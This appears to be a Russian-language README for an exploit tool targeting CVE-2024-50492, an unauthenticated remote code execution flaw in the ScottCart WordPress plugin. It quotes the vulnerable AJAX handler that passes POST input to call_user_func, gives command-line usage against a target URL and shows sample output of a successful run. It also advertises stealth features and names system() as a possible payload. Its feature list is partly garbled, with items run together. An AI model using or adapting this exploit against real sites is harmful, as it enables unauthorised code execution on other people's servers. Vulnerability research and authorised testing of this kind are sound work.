
ScottCart <= 1.1 - Неавторизованное удаленное выполнение кода
🔥 Эксплойт для ScottCart <= 1.1 - Удалённое выполнение кода без аутентификации
🧑💻 Автор: Nxploit – Khaled Alenazi
Плагин ScottCart для WordPress (версии ≤ 1.1) уязвим к удалённому выполнению кода (RCE).
Это позволяет неаутентифицированным атакующим выполнять произвольные функции PHP на сервере через уязвимый AJAX-эндпоинт.
Плагин регистрирует незащищённое AJAX-действие:
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');
Которое выполняет:
call_user_func($_POST['function']);
Позволяя атакующим вызывать любую существующую функцию PHP, например:
phpinfo()scottcart_get_the_user_ip()system() ← если расширена в модифицированных средахphpinfo() для PoCresults_2025-03-26_14-33-01.txt)User-Agent, обработка ошибок и игнорирование SSL для скрытностиusage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]
ScottCart <= 1.1 - Unauthenticated Remote Code Execution
By Nxploit Khaled Alenazi.
options:
-h, --help Показать это справочное сообщение и выйти
-u URL, --url URL Базовый URL цели (например, http://192.168.100.74:888/wordpress)
-p PAYLOAD, --payload PAYLOAD
Вызываемая функция (по умолчанию: phpinfo)
phpinfo()):python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip
[+] Target URL: http://192.168.100.74:888/wordpress
[+] Payload Function: phpinfo
[*] Launching exploit...
[+] Sending payload: function=phpinfo
[+] Exploit successful! Output:
PHP Version => 8.1.12
...
📁 И сохранено в: results_2025-03-26_14-33-01.txt
Этот инструмент предназначен только для образовательного и авторизованного тестирования.
Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.